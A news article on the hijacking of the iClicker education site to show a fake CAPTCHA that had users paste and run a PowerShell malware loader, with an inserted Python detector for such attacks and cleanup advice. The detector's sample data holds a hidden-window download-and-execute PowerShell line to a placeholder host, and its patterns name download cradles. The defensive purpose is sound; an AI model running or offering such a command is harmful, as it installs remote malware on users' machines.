Malicious CAPTCHA Test Targets Education Site: What to Do If the Scam Hit Your PC
The iClicker.com education site was hijacked last month to display a malicious CAPTCHA test, designed to trick users into installing Windows malware. The popular online platform, which provides IT services for teachers, has over 5,000 instructors and 7 million students using its products.
The fake CAPTCHA test, discovered by security researchers at BleepingComputer, appeared on the landing page of iClicker.com from April 12-16. Normally, CAPTCHA tests are designed to prevent web-scraping bots by asking online visitors to complete a challenge, like identifying objects in an image. However, this malicious CAPTCHA test disguised its challenge as a set of computer commands, including "Press Win + R," "Press CTRL + V" and then "Enter."
Unaware users might follow the instructions, thinking it's an innocuous request. In reality, the first command opens the Windows Run dialog box, a way to launch programs. Pressing "CTRL + V" then pastes malicious code that the CAPTCHA page had silently copied to the user's clipboard, and pressing Enter executes it.
The pasted computer code operates as a PowerShell script that retrieves additional malware when run, giving the hacker remote access to the PC. The University of Michigan's IT security team initially warned students about the fake CAPTCHA test earlier this month.
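The Win+R, Ctrl+V, Enter chain leaves a characteristic trace: a PowerShell process whose parent is explorer.exe (the Run dialog's host) and whose command line carries a hidden-window, encoded-command or download-and-execute pattern. The following detector, an added example that is not from the article or from iClicker, scores constructed Sysmon-style process-creation records for exactly that combination; the field names and sample values are assumptions, not data from the incident.

```python
import re

# Constructed Sysmon-style process-creation records (hypothetical, not from the
# iClicker incident). Only the three fields the detector needs are included.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -EncodedCommand QQBBAEEA"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Command-line traits typical of a pasted one-liner that fetches a second stage.
INDICATORS = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-enc\w*\s", re.I),
    "download cradle": re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient|curl|wget)\b|https?://", re.I),
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")


def score_event(event):
    """Return the list of indicator names matched by one event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def find_clickfix_candidates(events):
    """Flag PowerShell launched from explorer.exe (the Run dialog's parent)
    whose command line shows at least one suspicious trait."""
    hits = []
    for i, ev in enumerate(events):
        if not ev.get("ParentImage", "").lower().endswith("explorer.exe"):
            continue
        if not ev.get("Image", "").lower().endswith(SCRIPT_HOSTS):
            continue
        reasons = score_event(ev)
        if reasons:
            hits.append({"index": i, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["index"], SAMPLE_EVENTS[hit["index"]]["CommandLine"], hit["reasons"])
```

Legitimate PowerShell launched from a terminal or build tool has a different parent and normally none of these traits, so the parent check keeps the rule from firing on ordinary administration.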
“Users of iClicker are at risk if they logged into the iClicker site and followed the directions in the fake CAPTCHA from April 12-16,” the University of Michigan says. The parent company Macmillan Learning didn’t immediately respond to a request for comment, but iClicker confirmed the hijacking in a security bulletin.
“An unrelated third party placed a false Captcha on our iClicker landing page before users logged into iClicker on our website,” the notice says. “This third party was hoping to get users to click on the false captcha similar to what we unfortunately experience quite often in phishing emails these days.” The security bulletin, however, was configured to prevent search engines from indexing it.
Although it’s unclear what malware was installed, the bulletin advises teachers or students who fell for the fake CAPTCHA test to immediately run antivirus software on their PCs. Affected victims should also consider changing their passwords since it’s possible the malware was designed to steal login credentials and cookies from internet browsers.
Be Cautious Around CAPTCHA Tests
Security researchers have also spotted fake CAPTCHA tests targeting gamers, highlighting the need for users to be cautious around such tests. If you receive a CAPTCHA test that asks you to perform unusual keyboard commands, trust your instincts and avoid following the instructions.
What to Do Next
If you suspect that your PC has been infected with malware from the fake CAPTCHA test, take immediate action:
- Run antivirus software on your PC to detect and remove any malware.
- Change your passwords for all accounts, especially those related to email, social media, and online banking.
- Regularly back up your data to a secure location.
By being aware of these tactics and taking the necessary precautions, you can protect yourself from falling victim to malicious CAPTCHA tests and other cyber threats.